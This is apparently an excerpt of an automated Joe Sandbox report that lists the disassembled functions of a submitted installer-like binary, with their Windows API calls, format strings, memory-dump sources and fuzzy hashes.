                                                • Snapshot File: hcaresult_0_2_400000_LVDdWBGnVE.jbxd
                                                Similarity
                                                • API ID: MessageSend$Timeout
                                                • String ID: !
                                                • API String ID: 1777923405-2657877971
                                                • Opcode ID: e47ff439633ded3fb17ec5eecd0e1b6806a5c9fa211e2190a11df636c871b995
                                                • Instruction ID: 6a5c1514d43e21eed083d94b15ba6593763dc9af2b3e6337d8774d5f4809249f
                                                • Opcode Fuzzy Hash: e47ff439633ded3fb17ec5eecd0e1b6806a5c9fa211e2190a11df636c871b995
                                                • Instruction Fuzzy Hash: 56217171900209BADF15AFB4D886ABE7BB9EF04349F10413EF602F60E2D6794A40D758
                                                Function 004043D9 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 73stringCOMMON
                                                Download Yara Rule
                                                APIs
                                                • lstrlenW.KERNEL32(00451D98,%u.%u%s%s,?,00000000,00000000,?,FFFFFFDC,00000000,?,000000DF,00451D98,?), ref: 00404476
                                                • wsprintfW.USER32 ref: 00404483
                                                • SetDlgItemTextW.USER32(?,00451D98,000000DF), ref: 00404496
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2132797675.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2132780889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132815478.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132831072.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132831072.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132831072.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132831072.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132831072.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132939239.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_LVDdWBGnVE.jbxd
                                                Similarity
                                                • API ID: ItemTextlstrlenwsprintf
                                                • String ID: %u.%u%s%s
                                                • API String ID: 3540041739-3551169577
                                                • Opcode ID: a810ffe09f2dc908503b2f58e47bd406bb4654f19e43ddd30bdf0acdc5011288
                                                • Instruction ID: 019992b557dc20c415266b5889428492ee6a52d86c3b4952972254649920ef77
                                                • Opcode Fuzzy Hash: a810ffe09f2dc908503b2f58e47bd406bb4654f19e43ddd30bdf0acdc5011288
                                                • Instruction Fuzzy Hash: DC11527270021477CF10AA699D45F9E765EEBC5334F10423BF519F31E1D6388A158259
                                                Function 004027E3 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 60registryCOMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 00401553: RegOpenKeyExW.ADVAPI32(?,00000000,00000022,00000000,?,?), ref: 0040158B
                                                • RegCloseKey.ADVAPI32(00000000), ref: 0040282E
                                                • RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 0040280E
                                                  • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                  • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                Strings
                                                • DeleteRegValue: "%s\%s" "%s", xrefs: 00402820
                                                • DeleteRegKey: "%s\%s", xrefs: 00402843
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2132797675.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2132780889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132815478.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132831072.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132831072.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132831072.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132831072.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132831072.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132939239.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_LVDdWBGnVE.jbxd
                                                Similarity
                                                • API ID: CloseDeleteOpenValuelstrlenwvsprintf
                                                • String ID: DeleteRegKey: "%s\%s"$DeleteRegValue: "%s\%s" "%s"
                                                • API String ID: 1697273262-1764544995
                                                • Opcode ID: 1c7787f783619d22a727722e8428d119ca1e8f511c7c384e8364c1fbbf216132
                                                • Instruction ID: 70287f52249eeba914cab3bee2f8f529b2cd5257afac1a85b0186071c419a2a5
                                                • Opcode Fuzzy Hash: 1c7787f783619d22a727722e8428d119ca1e8f511c7c384e8364c1fbbf216132
                                                • Instruction Fuzzy Hash: 2511E732E00200ABDB10FFA5DD4AABE3A64EF40354F10403FF50AB61D2D6798E50C6AD
                                                Function 00402665 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 56stringCOMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                  • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                  • Part of subcall function 00406301: FindFirstFileW.KERNELBASE(00461E18,00466A20,00461E18,004067FA,00461E18), ref: 0040630C
                                                  • Part of subcall function 00406301: FindClose.KERNEL32(00000000), ref: 00406318
                                                • lstrlenW.KERNEL32 ref: 004026B4
                                                • lstrlenW.KERNEL32(00000000), ref: 004026C1
                                                • SHFileOperationW.SHELL32(?,?,?,00000000), ref: 004026EC
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2132797675.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2132780889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132815478.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132831072.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132831072.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132831072.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132831072.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132831072.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132939239.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_LVDdWBGnVE.jbxd
                                                Similarity
                                                • API ID: lstrlen$FileFind$CloseFirstOperationwvsprintf
                                                • String ID: CopyFiles "%s"->"%s"
                                                • API String ID: 2577523808-3778932970
                                                • Opcode ID: 0c98d155eaf4bf30867e20e2ef9323f8e108a065a1149d83459e1735f252947f
                                                • Instruction ID: 7c1d43f40acf3f33c375e3424532232737b5c7d4dc38a4161669d523a66d0fcf
                                                • Opcode Fuzzy Hash: 0c98d155eaf4bf30867e20e2ef9323f8e108a065a1149d83459e1735f252947f
                                                • Instruction Fuzzy Hash: 8A114F71D00214AADB10FFF6984699FBBBCAF44354B10843BA502F72D2E67989418759
                                                Function 00406250 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 53stringCOMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2132797675.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2132780889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132815478.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132831072.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132831072.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132831072.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132831072.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132831072.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132939239.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_LVDdWBGnVE.jbxd
                                                Similarity
                                                • API ID: lstrcatwsprintf
                                                • String ID: %02x%c$...
                                                • API String ID: 3065427908-1057055748
                                                • Opcode ID: e028bc25539a6ddd5d675d42839d030ce8218c39fe920002d96002040e934ce0
                                                • Instruction ID: 9bf571533c0fd83e5fe1ff618cfd19ea7d9613251e6e948213dceada22d50e27
                                                • Opcode Fuzzy Hash: e028bc25539a6ddd5d675d42839d030ce8218c39fe920002d96002040e934ce0
                                                • Instruction Fuzzy Hash: E201D272510219BFCB01DF98CC44A9EBBB9EF84714F20817AF806F3280D2799EA48794
                                                Function 00405073 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 41comCOMMON
                                                Download Yara Rule
                                                APIs
                                                • OleInitialize.OLE32(00000000), ref: 00405083
                                                  • Part of subcall function 00403DDB: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DED
                                                • OleUninitialize.OLE32(00000404,00000000), ref: 004050D1
                                                  • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                  • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2132797675.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2132780889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132815478.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132831072.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132831072.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132831072.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132831072.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132831072.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132939239.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_LVDdWBGnVE.jbxd
                                                Similarity
                                                • API ID: InitializeMessageSendUninitializelstrlenwvsprintf
                                                • String ID: Section: "%s"$Skipping section: "%s"
                                                • API String ID: 2266616436-4211696005
                                                • Opcode ID: 08831c163c79f6045eee3939d78ed76b32885a7039adc7eb93c092c170fa4538
                                                • Instruction ID: 3a4ae3dd184d198318ece42e1af7a5bc75ccdc2bd7a030bb5b2a43e0dda7b67b
                                                • Opcode Fuzzy Hash: 08831c163c79f6045eee3939d78ed76b32885a7039adc7eb93c092c170fa4538
                                                • Instruction Fuzzy Hash: 0EF0F433504300ABE7106766AC02B1A7BA0EF84724F25017FFA09721E2DB7928418EAD
                                                Function 004020F9 Relevance: 6.0, APIs: 4, Instructions: 45COMMON
                                                Download Yara Rule
                                                APIs
                                                • GetDC.USER32(?), ref: 00402100
                                                • GetDeviceCaps.GDI32(00000000), ref: 00402107
                                                • MulDiv.KERNEL32(00000000,00000000), ref: 00402117
                                                  • Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,00427576,762323A0,00000000), ref: 00406902
                                                • CreateFontIndirectW.GDI32(00420110), ref: 0040216A
                                                  • Part of subcall function 00405F7D: wsprintfW.USER32 ref: 00405F8A
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2132797675.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2132780889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132815478.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132831072.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132831072.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132831072.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132831072.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132831072.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132939239.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_LVDdWBGnVE.jbxd
                                                Similarity
                                                • API ID: CapsCreateDeviceFontIndirectVersionwsprintf
                                                • String ID:
                                                • API String ID: 1599320355-0
                                                • Opcode ID: 5e7bfe574d04e9302ce96a75028483347f8e754cab2f6e4722de83d8c32547a7
                                                • Instruction ID: 0ba792ce9c48b24537a9dfec97a4105c0a721b5be590283e64661935fd66df2d
                                                • Opcode Fuzzy Hash: 5e7bfe574d04e9302ce96a75028483347f8e754cab2f6e4722de83d8c32547a7
                                                • Instruction Fuzzy Hash: B6018872B042509FF7119BB4BC4ABAA7BE4A715315F504436F141F61E3CA7D4411C72D
                                                Function 00407224 Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 43stringCOMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 00406EFE: CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406F22
                                                • lstrcpynW.KERNEL32(?,?,00000009), ref: 00407265
                                                • lstrcmpW.KERNEL32(?,Version ), ref: 00407276
                                                • lstrcpynW.KERNEL32(?,?,?), ref: 0040728D
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2132797675.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2132780889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132815478.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132831072.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132831072.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132831072.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132831072.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132831072.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132939239.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_LVDdWBGnVE.jbxd
                                                Similarity
                                                • API ID: lstrcpyn$CreateFilelstrcmp
                                                • String ID: Version
                                                • API String ID: 512980652-315105994
                                                • Opcode ID: e08784de301d9fe6ca80962c3bdf8726d1c794b972164068317a4e691a2db981
                                                • Instruction ID: f6016284c167eb8c93e4c4d2cd91337f160ffdcdaea293fd9af5b6974d265005
                                                • Opcode Fuzzy Hash: e08784de301d9fe6ca80962c3bdf8726d1c794b972164068317a4e691a2db981
                                                • Instruction Fuzzy Hash: 74F08172A0021CBBDF109BA5DD45EEA777CAB44700F000076F600F6191E2B5AE148BA1
                                                Function 004032D2 Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                                Download Yara Rule
                                                APIs
                                                • DestroyWindow.USER32(00000000,00000000,0040372F,00000001,?,?,?,00000000,00403A73,?), ref: 004032E5
                                                • GetTickCount.KERNEL32 ref: 00403303
                                                • CreateDialogParamW.USER32(0000006F,00000000,0040324C,00000000), ref: 00403320
                                                • ShowWindow.USER32(00000000,00000005,?,?,?,00000000,00403A73,?), ref: 0040332E
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2132797675.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2132780889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132815478.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132831072.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132831072.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132831072.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132831072.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132831072.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132939239.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_LVDdWBGnVE.jbxd
                                                Similarity
                                                • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                • String ID:
                                                • API String ID: 2102729457-0
                                                • Opcode ID: 20fc2252fa4e8cade60f22cfb8dff2eb59aca0eba7377cdae62c8c9885b14618
                                                • Instruction ID: 7080548a0c715e844c944b711630a30770084a0de0adb1936a850f0acfbe0ad2
                                                • Opcode Fuzzy Hash: 20fc2252fa4e8cade60f22cfb8dff2eb59aca0eba7377cdae62c8c9885b14618
                                                • Instruction Fuzzy Hash: 76F05E30541220BBC620AF24FD89AAF7F68B705B1274008BAF405B11A6C7384D92CFDC
                                                Function 00406391 Relevance: 6.0, APIs: 4, Instructions: 31memorylibraryloaderCOMMON
                                                Download Yara Rule
                                                APIs
                                                • GlobalAlloc.KERNEL32(00000040,00002004,00000000,?,?,00402449,?,?,?,00000008,00000001,000000F0), ref: 0040639C
                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00002004,00000000,00000000,?,?,00402449,?,?,?,00000008,00000001), ref: 004063B2
                                                • GetProcAddress.KERNEL32(?,00000000), ref: 004063C1
                                                • GlobalFree.KERNEL32(00000000), ref: 004063CA
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2132797675.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2132780889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132815478.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132831072.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132831072.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132831072.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132831072.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132831072.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132939239.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_LVDdWBGnVE.jbxd
                                                Similarity
                                                • API ID: Global$AddressAllocByteCharFreeMultiProcWide
                                                • String ID:
                                                • API String ID: 2883127279-0
                                                • Opcode ID: cfe0beae58ad61bea83a9ac8add919dc7b7c61ebe1ef4fe2e37f024ea1666988
                                                • Instruction ID: 23858f5f5f858bd20c6f81bae205610dc5c3869b82bfcacec746ad73dc06cfd6
                                                • Opcode Fuzzy Hash: cfe0beae58ad61bea83a9ac8add919dc7b7c61ebe1ef4fe2e37f024ea1666988
                                                • Instruction Fuzzy Hash: 82E092313001117BF2101B269D8CD677EACDBCA7B2B05013AF645E11E1C6308C10C674
                                                Function 004048F8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • IsWindowVisible.USER32(?), ref: 0040492E
                                                • CallWindowProcW.USER32(?,00000200,?,?), ref: 0040499C
                                                  • Part of subcall function 00403DDB: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DED
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2132797675.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2132780889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132815478.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132831072.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132831072.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132831072.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132831072.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132831072.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132939239.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_LVDdWBGnVE.jbxd
                                                Similarity
                                                • API ID: Window$CallMessageProcSendVisible
                                                • String ID:
                                                • API String ID: 3748168415-3916222277
                                                • Opcode ID: c170883d227fca0112a12e156e2c8e9ea80fa6a38e1ecce58c6b14ca94f7736c
                                                • Instruction ID: 3c1fd1ddb59456d7d2ea24cd553691e7f5dd8d926ac1a383129e0726a186868e
                                                • Opcode Fuzzy Hash: c170883d227fca0112a12e156e2c8e9ea80fa6a38e1ecce58c6b14ca94f7736c
                                                • Instruction Fuzzy Hash: CE118FF1500209ABDF115F65DC44EAB776CAF84365F00803BFA04761A2C37D8D919FA9
                                                Function 00402797 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 25stringCOMMON
                                                Download Yara Rule
                                                APIs
                                                • GetPrivateProfileStringW.KERNEL32(00000000,00000000,?,?,00002003,00000000), ref: 004027CD
                                                • lstrcmpW.KERNEL32(?,?,?,00002003,00000000,000000DD,00000012,00000001), ref: 004027D8
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2132797675.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2132780889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132815478.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132831072.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132831072.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132831072.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132831072.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132831072.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132939239.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_LVDdWBGnVE.jbxd
                                                Similarity
                                                • API ID: PrivateProfileStringlstrcmp
                                                • String ID: !N~
                                                • API String ID: 623250636-529124213
                                                • Opcode ID: 07e0e1e700d966a463b53d73ca6f39700f71f89c173b529fa76a4fed3a8722df
                                                • Instruction ID: 1025b72e91f13a3121db677028adcce723ab2f3f19a12cbdb86f5280e69f3e4e
                                                • Opcode Fuzzy Hash: 07e0e1e700d966a463b53d73ca6f39700f71f89c173b529fa76a4fed3a8722df
                                                • Instruction Fuzzy Hash: 14E0C0716002086AEB01ABA1DD89DAE7BACAB45304F144426F601F71E3E6745D028714
                                                Function 00405C6B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON
                                                Download Yara Rule
                                                APIs
                                                • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00461DD0,Error launching installer), ref: 00405C90
                                                • CloseHandle.KERNEL32(?), ref: 00405C9D
                                                Strings
                                                • Error launching installer, xrefs: 00405C74
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2132797675.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2132780889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132815478.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132831072.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132831072.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132831072.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132831072.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132831072.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132939239.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_LVDdWBGnVE.jbxd
                                                Similarity
                                                • API ID: CloseCreateHandleProcess
                                                • String ID: Error launching installer
                                                • API String ID: 3712363035-66219284
                                                • Opcode ID: d7e07479a26add6e139fb42e4e519ed4ce81f94bdda572b5be1add7e8fe8fde5
                                                • Instruction ID: 058e85fc593d498414a6a643ff83d14e048665682532f700ab3f6144ed6d8858
                                                • Opcode Fuzzy Hash: d7e07479a26add6e139fb42e4e519ed4ce81f94bdda572b5be1add7e8fe8fde5
                                                • Instruction Fuzzy Hash: A4E0ECB0900209AFEB009F65DD09E7B7BBCEB00384F084426AD10E2161E778D8148B69
                                                Function 004062CF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13stringCOMMON
                                                Download Yara Rule
                                                APIs
                                                • lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                • wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                  • Part of subcall function 00406113: CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,00406300,00000000), ref: 0040612A
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2132797675.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2132780889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132815478.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132831072.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132831072.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132831072.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132831072.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132831072.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2132939239.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_LVDdWBGnVE.jbxd
                                                Similarity
                                                • API ID: CloseHandlelstrlenwvsprintf
                                                • String ID: RMDir: RemoveDirectory invalid input("")
                                                • API String ID: 3509786178-2769509956
                                                • Opcode ID: db8d081d013b9790c932ab277b4a3a99312fd955ab88a80e97be1a4fe9473cae
                                                • Instruction ID: 2c5812d3804eb93f93713fa8b891b4ce654538dc852139f9e16b4ff69120e8c2
                                                • Opcode Fuzzy Hash: db8d081d013b9790c932ab277b4a3a99312fd955ab88a80e97be1a4fe9473cae
